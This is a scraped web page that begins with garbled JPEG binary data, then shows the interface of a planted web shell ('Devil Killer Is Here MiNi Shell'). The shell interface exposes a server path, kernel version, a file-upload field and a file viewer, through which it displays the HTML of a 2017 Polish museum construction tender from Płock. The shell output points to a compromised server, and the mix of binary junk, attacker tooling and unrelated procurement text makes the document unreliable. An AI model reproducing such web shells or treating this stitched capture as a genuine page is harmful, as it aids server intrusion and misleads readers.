JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170904/582904-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 582904-N-2017 z dnia 2017-09-04 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Muzeum Mazowieckie w Płocku</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Odtworzenie i rewaloryzacja budynku zabytkowego od ul. Kolegialnej 6 oraz przebudowa przynależnych oficyn na potrzeby Muzeum Mazowieckiego w Płocku.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Zamówienie jest współfinansowane ze środków Unii Europejskiej w ramach umowy o dofinansowanie projektu realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego na lata 2014-2020 (RPO WM 2014-2020)</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Tak</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl">Zamawiającym jest: Muzeum Mazowieckie w Płocku 09-402 Płock, ul. Tumska 8Zamawiający ustanowił inwestora zastępczego, który działa w jego imieniu i na jego rzecz zgodnie z art.18 ust. 2 w związku z art. 15 ust. 2 ustawy Prawo zamówień publicznych. Inwestorem zastępczym jest:PILAMIS Sp. z o.o.,Sp. k. z siedzibą w Łodzi al. Piłsudskiego 133d lok. 127. Strony zawarły umowę 19maja 2017 r. - nr: 53/2017</span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Muzeum Mazowieckie w Płocku</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">28575800000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Tumska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">8</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">09-402 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Płock</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">24 364 70 70</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zamowieniapubliczne@muzeumplock.eu</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">24 364 70 70; 24 262 44 93</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.muzeumplock.bip.org.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Jednostki organizacyjne administracji samorządowej</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.muzeumplock.bip.org.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja"></span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Ofertę należy złożyć w zamkniętej kopercie, w siedzibie Zamawiającego.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga">Muzeum Mazowieckie w Płocku 09-402 Płock, ul. Tumska 8 pok. 204B Komunikacja</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Odtworzenie i rewaloryzacja budynku zabytkowego od ul. Kolegialnej 6 oraz przebudowa przynależnych oficyn na potrzeby Muzeum Mazowieckiego w Płocku.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">Ag-371/3/17</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest robota budowlana polegająca na rozbiórce istniejącegoobiektu oraz wykonaniu budynku usługowego na potrzeby Muzeum Mazowieckiego w Płocku w ramachzadania p.n.: ,,Odtworzenie irewaloryzacja budynku zabytkowego od ul. Kolegialnej 6 oraz przebudowaprzynależnych oficyn na potrzeby Muzeum Mazowieckiego w Płocku" - Etap I. Pierwszy etap będzieobejmowałrozbiórkę istniejących obiektów położonych przy ul. Kolegialnej 6, zgodnie z projektemrozbiórek, a następnie odtworzenie irewaloryzację budynku frontowego (zabytkowego) przy ul.Kolegialnej 6 wraz z realizacją przyłączy instalacyjnych. Przedmiotowy obiekt stanowi zwartą,prostokątną bryłę z dachem wielopołaciowym. Jest budynkiem 3 kondygnacyjnym, podpiwniczony.Zaprojektowano w nim pomieszczenia magazynowe, techniczne, wystawiennicze, sanitarne oraz głównewejście do muzeum ze strefą szatni w holu głównym. Szczegółowy opis zamówienia i wytyczne dla jegorealizacji określa dokumentacja projektowa (jako załącznik do SIWZ) składająca się z: projektuwykonawczego, który obejmuje: projekty: budowlany, wykonawczy - branżowy ispecyfikacje technicznewykonania i odbioru robót. Na podstawie art. 29 ust. 4 ustawy Zamawiający wymaga, aby wśród osóbbezpośrednio uczestniczących w wykonywaniu zamówienia zatrudniona była na podstawie stosunku pracy(umowy o pracę w rozumieniu przepisów Kodeksu pracy) w wymiarze pełnego wymiaru czasu pracy(pełny etat) co najmniej 1 osoba bezrobotna na podstawie skierowania powiatowego urzędu pracyzgodnie z ustawą z dnia 20 kwietnia 2004 r. o promocji zatrudnienia instytucjach rynku pracy (t.j. Dz. U.z 2015 r., poz. 149) lub na podstawie właściwego dokumentu kierującego bezrobotnych do pracodawcy,wystawionego przez organ zajmujący się realizacją zadań z zakresu rynku pracy określonego wanalogicznych przepisach państwa członkowskiego UE lub Europejskiego Obszaru Gospodarczego wktórym Wykonawca ma siedzibę lub miejsce zamieszkania. Wykonawca, w przypadku uznania jegooferty za najkorzystniejszą, zobowiązany jest do:-zatrudnienia co najmniej 1 osoby bezrobotnej, zgodnie zwymaganiami wskazanymi powyżej w terminie nie dłuższym niż 14 dni od daty podpisania umowy. -przedłożenia zamawiającemu dokumentów związanych z procedurą zatrudnienia, w szczególnościzgłoszenia oferty pracy przedstawionej powiatowemu urzędów pracy, odpisu skierowania osobybezrobotnej przez powiatowy urząd pracy do pracodawcy oraz umowy o pracę z bezrobotnym - wterminie do 21 dni od daty podpisania umowy. Zatrudnienie powinno trwać do końca realizacjiprzedmiotu umowy. Zamawiający określił w opisie przedmiotu zamówieni wymagania zatrudnienia przezWykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane przezzamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega nawykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodekspracy (Dz. U. z 2014 r. poz. 1502, z późn. zm.). Zamawiający przewidując wymagania, o których mowapowyżej określając:- sposób dokumentowania zatrudnienia osób, - uprawnienia zamawiającego wzakresie kontrolispełniania przez Wykonawcę wymagań, oraz sankcji z tytułu niespełnienia tych wymagań,- rodzaju czynności niezbędnych do realizacji zamówienia, których dotyczą wymagania zatrudnienia napodstawie umowy o pracę przez Wykonawcę lub podwykonawcę osób wykonujących czynności wtrakcie realizacji zamówienia. Zamawiający wymaga, aby czynności polegające na faktycznymwykonywaniu robót budowlanych związanych z wykonaniem całego zamówienia o ile nie są (będą)wykonywane przez daną osobę w ramach prowadzonej przez nią działalności gospodarczej byływykonywane przez osoby zatrudnione przez Wykonawcę, podwykonawcę na podstawie umowy o pracęw pełnym wymiarze czasu pracy. Rodzaj czynności(niezbędnych do wykonania zamówienia), co doktórych wykonania Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcęlub podwykonawcę osób wykonujących w trakcie realizacji zamówienia:- czynności pracownikabudowlanego obejmującego cały zakres rzeczowy robót budowlanych opisanych dokumentacjitechnicznej, przedmiarze robót w Szczegółowej Specyfikacji Technicznej Wykonania i Odbioru Robót.Sposób dokumentowania zatrudnienia osób. Zamawiający wymaga:- aby Wykonawca najpóźniej w dniuprzekazania terenu budowy dostarczył Zamawiającemu listę z pełnym składem osobowym pracownikówobejmujący cały zakres rzeczowy robót budowlanych, - aby lista była aktualizowana na bieżąco tj. zakażdym razem, gdy nastąpi zmiana personalna w składzie osobowym pracowników na budowie, - abyroboty budowlane były wykonywane przez osoby z listy, - aby wykonawca do wystawionych fakturzałączał wykaz osób realizujących cały zakres rzeczowy robót budowlanych, które były zatrudnione napodstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy zminimalnym wynagrodzeniem za pracę ustalonym na podstawie art. 2 ust. 3-5 ustawy z dnia 10października 2002 r. o minimalnym wynagrodzeniu za pracę, przez cały okres realizacji przedmiotuzamówienia (jeżeli była zmiana osób zatrudnionych podać w jakim czasie). Uprawnienia Zamawiającegow zakresie kontrolispełniania przez Wykonawcę wymagań, o których mowa w art. 29 ust. 3a ustawy Pzp,oraz sankcji z tytułu niespełnienia tych wymagań stosownie do art. 29 ust. 3a ustawy Pzp Zamawiającyokreślił we wzorze umowy.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45200000-9 </TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45212313-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45110000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233200-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45000000-7</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-10-30</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Zamawiający nie dopuszcza składania ofert częściowych. Podziałzamówienia na części jest uprawnieniem Zamawiającego. Możliwość podziału przedmiotu zamówienia naczęści został wprowadzony do przepisów w celu zwiększenia konkurencyjności. Zgodnie z motywem 78preambuły do dyrektywy klasycznej instytucje zamawiające, należy w szczególności zachęcać do dzieleniadużych zamówień na części. Podziału takiego można dokonać na zasadzie ilościowej, tak by wielkośćposzczególnych zamówień lepiej odpowiadała możliwościom MŚP, lub na zasadzie jakościowej, zuwzględnieniem różnych zaangażowanych branż ispecjalizacji, tak by w większym stopniu dostosowaćtreść poszczególnych zamówień do wyspecjalizowanych sektorów MŚP, lub według różnych kolejnychetapów projektu. W niniejszym postepowaniu Zamawiający odstępuje od podziału zamówienia na części,gdyż podział groziłby nadmiernymi trudnościami technicznymi lub nadmiernymi kosztami wykonaniazamówienia, lub też potrzebom skoordynowania działań różnych wykonawców realizującychposzczególne części zamówienia mogłaby poważnie zagrozić właściwemu wykonaniu zamówienia wodpowiednim terminie. Nie ma możliwości podziału terenu objętego zakresem postępowania ozamówienie publiczne w takisposób, aby każdy z wykonawców mógłby w pełni być odpowiedzialny zaswoje działania przy realizacji przedmiotowych prac. Podział zamówienia na części zagrażałobyprawidłowej realizacji całości zamówienia. Zdaniem Zamawiającego celowość dokonania takiegopodziału nie ma znaczenia z punktu widzenia oceny zgodności postępowania zamawiającego z literąprawa zamówień publicznych. W orzeczeniu z dnia 11 grudnia 2014 r. sygn. C-440/13 (Croce AmicaOne Italia Srl v. Azienda Regionale Emergenza Urgenza). Trybunał stwierdził nawet, iż środki ochronyprawnej dostępne na gruncie wspólnotowych przepisów o zamówieniach publicznych, w ogóle nie służąbadaniu celowości działania zamawiającego a jedynie jej zgodności z prawem. Zgodnie z intencjamiwyrażonymi w Dyrektywie zamawiający powinien mieć obowiązek rozważenia celowości podziałuzamówień na części, jednocześnie zachowując swobodę autonomicznego podejmowania decyzji nakażdej podstawie, jaką uzna za stosowną, nie podlegając nadzorowi administracyjnemu anisądowemu. Wprzypadku gdy zdecyduje on, że podział zamówienia na części nie byłby właściwy, protokół zpostępowania powinien zawierać wskazanie głównych przyczyn takiej decyzji zamawiającego cowskazano na wstępie. Zamawiający nie dopuszcza składania ofert wariantowych.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> 